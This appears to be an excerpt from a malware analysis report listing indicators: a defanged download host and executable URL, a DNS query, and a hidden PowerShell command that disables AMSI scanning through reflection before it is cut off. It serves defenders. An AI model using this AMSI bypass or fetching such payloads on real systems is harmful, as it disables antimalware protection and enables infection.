Technical Information
- 'st##aa.com':80
- http://st##aa.com/old/today.exe
- DNS ASK st##aa.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -noprofile [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true);If (test-path $env:APPDATA +...' (with hidden window)